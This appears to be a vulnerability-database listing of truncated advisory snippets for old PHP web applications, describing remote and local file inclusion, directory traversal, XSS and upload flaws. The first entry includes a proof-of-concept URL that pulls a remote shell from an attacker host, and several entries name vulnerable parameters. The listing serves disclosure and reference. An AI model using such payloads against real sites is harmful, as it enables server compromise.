NukeHall 0.3 - Multiple Remote File Inclusions

NukeHall 0.3 - Multiple Remote File Inclusions Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg NukeHall PoC : http://server/path/admin/modules/blocks.php?spawroot=http://attacker.com/shell.txt?cmd Vuln : ./nukehall0.3/admin/modules/messages.php line 28 PoC :...

SkyPortal Picture Manager 0.11 - Contents Change

@=======================================@ ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== @=======================================@ @=Author : ByALBAYX @=Website : WWW.C4TEAM.ORG @=From : Turkish @=======================================@ @=Script :SkyPortal Picture Manager v0.11 @=S.Site...

Directory traversal

Directory traversal vulnerability in admin/modules/aa/preview.php in Syntax Desktop 2.7 allows remote attackers to include and execute arbitrary local files via a .. dot dot in the synTarget parameter...

Syntax Desktop 2.7 Local File Inclusion

-----------------:local File Include:----------------- ------------------------------------------------------- script: syntax-desktop 2-7 ------------------------------------------------------------------ download...

Directory traversal

Multiple directory traversal vulnerabilities in NavBoard 16 2.6.0 allow remote attackers to include and execute arbitrary local files via a .. dot dot in the module parameter to 1 adminmodules.php and 2 modules.php...

CVE-2002-2249

PHP remote file inclusion vulnerability in News Evolution 2.0 allows remote attackers to execute arbitrary PHP commands via the neurl parameter to 1 backend.php, 2 screen.php, or 3 admin/modules/comment.php...

Neuron Blog Admin Permission Bypass and Remote File Upload Vulnerability

Neuron Blog Admin Permission Bypass and Remote File Upload Vulnerability ------------------------------------------------------------------------ Script : Neuron Blog Version : 1.1 Site : http://dev.localhost.be/?q=detail-script&id=11 Founder : Rizgar Contact : [email protected] and...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in FireFly 1.1.01 allow remote attackers to execute arbitrary PHP code via a URL in the docroot parameter to 1 localize.php or 2 config.php in modules/admin/include/...

PT-2007-3754 · Comdev · Comdev One Admin Modules Builder

Name of the Vulnerable Software and Affected Versions: Comdev One Admin Modules Builder modbuild version 4.1 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the pathdocroot parameter to 1 "config-bak.php" or 2 "config.php" endpoints. However, it's noted...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in Supasite 1.23b allow remote attackers to execute arbitrary PHP code via a URL in the supadbpath parameter to 1 commonfunctions.php, 2 adminauthcookies.php, 3 adminmods.php, 4 adminnews.php, 5 admintopics.php, 6 adminusers.php, 7...

CVE-2006-6534

Multiple cross-site scripting XSS vulnerabilities in osCommerce 3.0a3 allow remote attackers to inject arbitrary web script or HTML via the 1 set parameter to admin/modules.php, the 2 selectedbox parameter to definitiva/admin/customers.php, the 3 lID parameter to admin/languagesdefinitions.php, o...

Cross site scripting

Multiple cross-site scripting XSS vulnerabilities in Tikiwiki aka Tiki CMS/Groupware 1.9.x allow remote attackers to inject arbitrary web script or HTML via malformed nested HTML tags such as "ipt" in 1 offset and 2 days parameters in a tiki-lastchanges.php, the 3 find and 4 offset parameters in ...